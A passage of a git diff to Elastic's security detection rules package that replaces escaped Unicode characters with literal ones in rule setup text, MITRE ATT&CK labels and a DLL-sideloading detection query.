Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_103.json b/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_103.json index ae916399c13..b00685f42d5 100644 --- a/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_103.json +++ b/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_103.json @@ -50,7 +50,7 @@ ], "risk_score": 21, "rule_id": "c0429aa8-9974-42da-bfb6-53a0a515a145", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_104.json b/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_104.json index 1e09612705b..b681930d1c0 100644 --- a/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_104.json +++ b/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_104.json @@ -50,7 +50,7 @@ ], "risk_score": 21, "rule_id": "c0429aa8-9974-42da-bfb6-53a0a515a145", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_105.json b/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_105.json index 2b2ac14813a..87f6ce975f7 100644 --- a/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_105.json +++ b/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_105.json @@ -50,7 +50,7 @@ ], "risk_score": 21, "rule_id": "c0429aa8-9974-42da-bfb6-53a0a515a145", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_106.json b/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_106.json index bd0909a20a8..5ff556c7ccd 100644 --- a/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_106.json +++ b/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_106.json @@ -50,7 +50,7 @@ ], "risk_score": 21, "rule_id": "c0429aa8-9974-42da-bfb6-53a0a515a145", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -85,7 +85,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_107.json b/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_107.json index 2ce0aa5550d..e51212be915 100644 --- a/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_107.json +++ b/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_107.json @@ -49,7 +49,7 @@ ], "risk_score": 21, "rule_id": "c0429aa8-9974-42da-bfb6-53a0a515a145", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/c0b9dc99-c696-4779-b086-0d37dc2b3778_1.json b/packages/security_detection_engine/kibana/security_rule/c0b9dc99-c696-4779-b086-0d37dc2b3778_1.json index dbf684ccfa1..b34fab06ce9 100644 --- a/packages/security_detection_engine/kibana/security_rule/c0b9dc99-c696-4779-b086-0d37dc2b3778_1.json +++ b/packages/security_detection_engine/kibana/security_rule/c0b9dc99-c696-4779-b086-0d37dc2b3778_1.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/c0be5f31-e180-48ed-aa08-96b36899d48f_100.json b/packages/security_detection_engine/kibana/security_rule/c0be5f31-e180-48ed-aa08-96b36899d48f_100.json index 597284a9ebf..613113b2216 100644 --- a/packages/security_detection_engine/kibana/security_rule/c0be5f31-e180-48ed-aa08-96b36899d48f_100.json +++ b/packages/security_detection_engine/kibana/security_rule/c0be5f31-e180-48ed-aa08-96b36899d48f_100.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/c0be5f31-e180-48ed-aa08-96b36899d48f_101.json b/packages/security_detection_engine/kibana/security_rule/c0be5f31-e180-48ed-aa08-96b36899d48f_101.json index ab77779aeeb..2981696bebd 100644 --- a/packages/security_detection_engine/kibana/security_rule/c0be5f31-e180-48ed-aa08-96b36899d48f_101.json +++ b/packages/security_detection_engine/kibana/security_rule/c0be5f31-e180-48ed-aa08-96b36899d48f_101.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/c125e48f-6783-41f0-b100-c3bf1b114d16_1.json b/packages/security_detection_engine/kibana/security_rule/c125e48f-6783-41f0-b100-c3bf1b114d16_1.json index 97b15dace99..e244e685513 100644 --- a/packages/security_detection_engine/kibana/security_rule/c125e48f-6783-41f0-b100-c3bf1b114d16_1.json +++ b/packages/security_detection_engine/kibana/security_rule/c125e48f-6783-41f0-b100-c3bf1b114d16_1.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/c125e48f-6783-41f0-b100-c3bf1b114d16_2.json b/packages/security_detection_engine/kibana/security_rule/c125e48f-6783-41f0-b100-c3bf1b114d16_2.json index 24381df9703..d93aea86a74 100644 --- a/packages/security_detection_engine/kibana/security_rule/c125e48f-6783-41f0-b100-c3bf1b114d16_2.json +++ b/packages/security_detection_engine/kibana/security_rule/c125e48f-6783-41f0-b100-c3bf1b114d16_2.json @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/c125e48f-6783-41f0-b100-c3bf1b114d16_3.json b/packages/security_detection_engine/kibana/security_rule/c125e48f-6783-41f0-b100-c3bf1b114d16_3.json index cebd5ce63ea..5385c8b01f0 100644 --- a/packages/security_detection_engine/kibana/security_rule/c125e48f-6783-41f0-b100-c3bf1b114d16_3.json +++ b/packages/security_detection_engine/kibana/security_rule/c125e48f-6783-41f0-b100-c3bf1b114d16_3.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/c125e48f-6783-41f0-b100-c3bf1b114d16_4.json b/packages/security_detection_engine/kibana/security_rule/c125e48f-6783-41f0-b100-c3bf1b114d16_4.json index b1826b42fe2..daa83733b1c 100644 --- a/packages/security_detection_engine/kibana/security_rule/c125e48f-6783-41f0-b100-c3bf1b114d16_4.json +++ b/packages/security_detection_engine/kibana/security_rule/c125e48f-6783-41f0-b100-c3bf1b114d16_4.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/c125e48f-6783-41f0-b100-c3bf1b114d16_5.json b/packages/security_detection_engine/kibana/security_rule/c125e48f-6783-41f0-b100-c3bf1b114d16_5.json index 62a0f06a010..65c0f031d63 100644 --- a/packages/security_detection_engine/kibana/security_rule/c125e48f-6783-41f0-b100-c3bf1b114d16_5.json +++ b/packages/security_detection_engine/kibana/security_rule/c125e48f-6783-41f0-b100-c3bf1b114d16_5.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/c1812764-0788-470f-8e74-eb4a14d47573_102.json b/packages/security_detection_engine/kibana/security_rule/c1812764-0788-470f-8e74-eb4a14d47573_102.json index 07518a6398d..d817c36bab7 100644 --- a/packages/security_detection_engine/kibana/security_rule/c1812764-0788-470f-8e74-eb4a14d47573_102.json +++ b/packages/security_detection_engine/kibana/security_rule/c1812764-0788-470f-8e74-eb4a14d47573_102.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", @@ -82,7 +82,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/c1812764-0788-470f-8e74-eb4a14d47573_103.json b/packages/security_detection_engine/kibana/security_rule/c1812764-0788-470f-8e74-eb4a14d47573_103.json index 146d0f8e8bc..0bfb3ce4d6f 100644 --- a/packages/security_detection_engine/kibana/security_rule/c1812764-0788-470f-8e74-eb4a14d47573_103.json +++ b/packages/security_detection_engine/kibana/security_rule/c1812764-0788-470f-8e74-eb4a14d47573_103.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", @@ -81,7 +81,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/c1812764-0788-470f-8e74-eb4a14d47573_104.json b/packages/security_detection_engine/kibana/security_rule/c1812764-0788-470f-8e74-eb4a14d47573_104.json index 4b4d369e542..ea2ec93d1ab 100644 --- a/packages/security_detection_engine/kibana/security_rule/c1812764-0788-470f-8e74-eb4a14d47573_104.json +++ b/packages/security_detection_engine/kibana/security_rule/c1812764-0788-470f-8e74-eb4a14d47573_104.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", @@ -81,7 +81,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/c1812764-0788-470f-8e74-eb4a14d47573_205.json b/packages/security_detection_engine/kibana/security_rule/c1812764-0788-470f-8e74-eb4a14d47573_205.json index 3ae99f7c48c..ea1098e58a3 100644 --- a/packages/security_detection_engine/kibana/security_rule/c1812764-0788-470f-8e74-eb4a14d47573_205.json +++ b/packages/security_detection_engine/kibana/security_rule/c1812764-0788-470f-8e74-eb4a14d47573_205.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", @@ -81,7 +81,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/c20cd758-07b1-46a1-b03f-fa66158258b8_1.json b/packages/security_detection_engine/kibana/security_rule/c20cd758-07b1-46a1-b03f-fa66158258b8_1.json index b85c97ab7bf..008fa47d3df 100644 --- a/packages/security_detection_engine/kibana/security_rule/c20cd758-07b1-46a1-b03f-fa66158258b8_1.json +++ b/packages/security_detection_engine/kibana/security_rule/c20cd758-07b1-46a1-b03f-fa66158258b8_1.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unsigned DLL Loaded by a Trusted Process", - "query": "library where host.os.type == \"windows\" and\n (dll.Ext.relative_file_creation_time \u003c= 500 or\n dll.Ext.relative_file_name_modify_time \u003c= 500 or\n dll.Ext.device.product_id : (\"Virtual DVD-ROM\", \"Virtual Disk\")) and dll.hash.sha256 != null and\n process.code_signature.status :\"trusted\" and not dll.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\") and\n /* DLL loaded from the process.executable current directory */\n endswith~(substring(dll.path, 0, length(dll.path) - (length(dll.name) + 1)), substring(process.executable, 0, length(process.executable) - (length(process.name) + 1)))\n and not user.id : \"S-1-5-18\"\n", + "query": "library where host.os.type == \"windows\" and\n (dll.Ext.relative_file_creation_time <= 500 or\n dll.Ext.relative_file_name_modify_time <= 500 or\n dll.Ext.device.product_id : (\"Virtual DVD-ROM\", \"Virtual Disk\")) and dll.hash.sha256 != null and\n process.code_signature.status :\"trusted\" and not dll.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\") and\n /* DLL loaded from the process.executable current directory */\n endswith~(substring(dll.path, 0, length(dll.path) - (length(dll.name) + 1)), substring(process.executable, 0, length(process.executable) - (length(process.name) + 1)))\n and not user.id : \"S-1-5-18\"\n", "related_integrations": [ { "package": "endpoint", @@ -95,7 +95,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/c20cd758-07b1-46a1-b03f-fa66158258b8_101.json b/packages/security_detection_engine/kibana/security_rule/c20cd758-07b1-46a1-b03f-fa66158258b8_101.json index 4c9326c2465..7b7a3a3ec57 100644 --- a/packages/security_detection_engine/kibana/security_rule/c20cd758-07b1-46a1-b03f-fa66158258b8_101.json +++ b/packages/security_detection_engine/kibana/security_rule/c20cd758-07b1-46a1-b03f-fa66158258b8_101.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unsigned DLL Loaded by a Trusted Process", - "query": "library where host.os.type == \"windows\" and\n (dll.Ext.relative_file_creation_time \u003c= 500 or\n dll.Ext.relative_file_name_modify_time \u003c= 500 or\n dll.Ext.device.product_id : (\"Virtual DVD-ROM\", \"Virtual Disk\")) and dll.hash.sha256 != null and\n process.code_signature.status :\"trusted\" and not dll.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\") and\n /* DLL loaded from the process.executable current directory */\n endswith~(substring(dll.path, 0, length(dll.path) - (length(dll.name) + 1)), substring(process.executable, 0, length(process.executable) - (length(process.name) + 1)))\n and not user.id : \"S-1-5-18\"\n", + "query": "library where host.os.type == \"windows\" and\n (dll.Ext.relative_file_creation_time <= 500 or\n dll.Ext.relative_file_name_modify_time <= 500 or\n dll.Ext.device.product_id : (\"Virtual DVD-ROM\", \"Virtual Disk\")) and dll.hash.sha256 != null and\n process.code_signature.status :\"trusted\" and not dll.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\") and\n /* DLL loaded from the process.executable current directory */\n endswith~(substring(dll.path, 0, length(dll.path) - (length(dll.name) + 1)), substring(process.executable, 0, length(process.executable) - (length(process.name) + 1)))\n and not user.id : \"S-1-5-18\"\n", "related_integrations": [ { "package": "endpoint", @@ -95,7 +95,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/c25e9c87-95e1-4368-bfab-9fd34cf867ec_104.json b/packages/security_detection_engine/kibana/security_rule/c25e9c87-95e1-4368-bfab-9fd34cf867ec_104.json index 59a09ad5ff8..b6716625e73 100644 --- a/packages/security_detection_engine/kibana/security_rule/c25e9c87-95e1-4368-bfab-9fd34cf867ec_104.json +++ b/packages/security_detection_engine/kibana/security_rule/c25e9c87-95e1-4368-bfab-9fd34cf867ec_104.json @@ -60,7 +60,7 @@ ], "risk_score": 73, "rule_id": "c25e9c87-95e1-4368-bfab-9fd34cf867ec", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/c25e9c87-95e1-4368-bfab-9fd34cf867ec_105.json b/packages/security_detection_engine/kibana/security_rule/c25e9c87-95e1-4368-bfab-9fd34cf867ec_105.json index b6a25e6f0b4..05f6813ba52 100644 --- a/packages/security_detection_engine/kibana/security_rule/c25e9c87-95e1-4368-bfab-9fd34cf867ec_105.json +++ b/packages/security_detection_engine/kibana/security_rule/c25e9c87-95e1-4368-bfab-9fd34cf867ec_105.json @@ -60,7 +60,7 @@ ], "risk_score": 73, "rule_id": "c25e9c87-95e1-4368-bfab-9fd34cf867ec", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/c25e9c87-95e1-4368-bfab-9fd34cf867ec_106.json b/packages/security_detection_engine/kibana/security_rule/c25e9c87-95e1-4368-bfab-9fd34cf867ec_106.json index 24219b89902..8020455ff3d 100644 --- a/packages/security_detection_engine/kibana/security_rule/c25e9c87-95e1-4368-bfab-9fd34cf867ec_106.json +++ b/packages/security_detection_engine/kibana/security_rule/c25e9c87-95e1-4368-bfab-9fd34cf867ec_106.json @@ -60,7 +60,7 @@ ], "risk_score": 73, "rule_id": "c25e9c87-95e1-4368-bfab-9fd34cf867ec", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/c25e9c87-95e1-4368-bfab-9fd34cf867ec_107.json b/packages/security_detection_engine/kibana/security_rule/c25e9c87-95e1-4368-bfab-9fd34cf867ec_107.json index 9569d89e71e..359f020f914 100644 --- a/packages/security_detection_engine/kibana/security_rule/c25e9c87-95e1-4368-bfab-9fd34cf867ec_107.json +++ b/packages/security_detection_engine/kibana/security_rule/c25e9c87-95e1-4368-bfab-9fd34cf867ec_107.json @@ -59,7 +59,7 @@ ], "risk_score": 73, "rule_id": "c25e9c87-95e1-4368-bfab-9fd34cf867ec", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/c28c4d8c-f014-40ef-88b6-79a1d67cd499_101.json b/packages/security_detection_engine/kibana/security_rule/c28c4d8c-f014-40ef-88b6-79a1d67cd499_101.json index 0bd521c02c7..f71b06c5d0d 100644 --- a/packages/security_detection_engine/kibana/security_rule/c28c4d8c-f014-40ef-88b6-79a1d67cd499_101.json +++ b/packages/security_detection_engine/kibana/security_rule/c28c4d8c-f014-40ef-88b6-79a1d67cd499_101.json @@ -29,7 +29,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/c28c4d8c-f014-40ef-88b6-79a1d67cd499_102.json b/packages/security_detection_engine/kibana/security_rule/c28c4d8c-f014-40ef-88b6-79a1d67cd499_102.json index 14402323384..91f75fc4d73 100644 --- a/packages/security_detection_engine/kibana/security_rule/c28c4d8c-f014-40ef-88b6-79a1d67cd499_102.json +++ b/packages/security_detection_engine/kibana/security_rule/c28c4d8c-f014-40ef-88b6-79a1d67cd499_102.json @@ -28,7 +28,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/c28c4d8c-f014-40ef-88b6-79a1d67cd499_103.json b/packages/security_detection_engine/kibana/security_rule/c28c4d8c-f014-40ef-88b6-79a1d67cd499_103.json index b1772abcc21..c3ac4088bb8 100644 --- a/packages/security_detection_engine/kibana/security_rule/c28c4d8c-f014-40ef-88b6-79a1d67cd499_103.json +++ b/packages/security_detection_engine/kibana/security_rule/c28c4d8c-f014-40ef-88b6-79a1d67cd499_103.json @@ -38,7 +38,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/c292fa52-4115-408a-b897-e14f684b3cb7_102.json b/packages/security_detection_engine/kibana/security_rule/c292fa52-4115-408a-b897-e14f684b3cb7_102.json index 5a4ac086733..6771f995f1d 100644 --- a/packages/security_detection_engine/kibana/security_rule/c292fa52-4115-408a-b897-e14f684b3cb7_102.json +++ b/packages/security_detection_engine/kibana/security_rule/c292fa52-4115-408a-b897-e14f684b3cb7_102.json @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/c292fa52-4115-408a-b897-e14f684b3cb7_103.json b/packages/security_detection_engine/kibana/security_rule/c292fa52-4115-408a-b897-e14f684b3cb7_103.json index dd881405ea3..e798d0205d4 100644 --- a/packages/security_detection_engine/kibana/security_rule/c292fa52-4115-408a-b897-e14f684b3cb7_103.json +++ b/packages/security_detection_engine/kibana/security_rule/c292fa52-4115-408a-b897-e14f684b3cb7_103.json @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/c292fa52-4115-408a-b897-e14f684b3cb7_104.json b/packages/security_detection_engine/kibana/security_rule/c292fa52-4115-408a-b897-e14f684b3cb7_104.json index 9720a19d461..a562437cba9 100644 --- a/packages/security_detection_engine/kibana/security_rule/c292fa52-4115-408a-b897-e14f684b3cb7_104.json +++ b/packages/security_detection_engine/kibana/security_rule/c292fa52-4115-408a-b897-e14f684b3cb7_104.json @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/c292fa52-4115-408a-b897-e14f684b3cb7_105.json b/packages/security_detection_engine/kibana/security_rule/c292fa52-4115-408a-b897-e14f684b3cb7_105.json index 1fe1b30b8cd..f8bf6ce1661 100644 --- a/packages/security_detection_engine/kibana/security_rule/c292fa52-4115-408a-b897-e14f684b3cb7_105.json +++ b/packages/security_detection_engine/kibana/security_rule/c292fa52-4115-408a-b897-e14f684b3cb7_105.json @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", 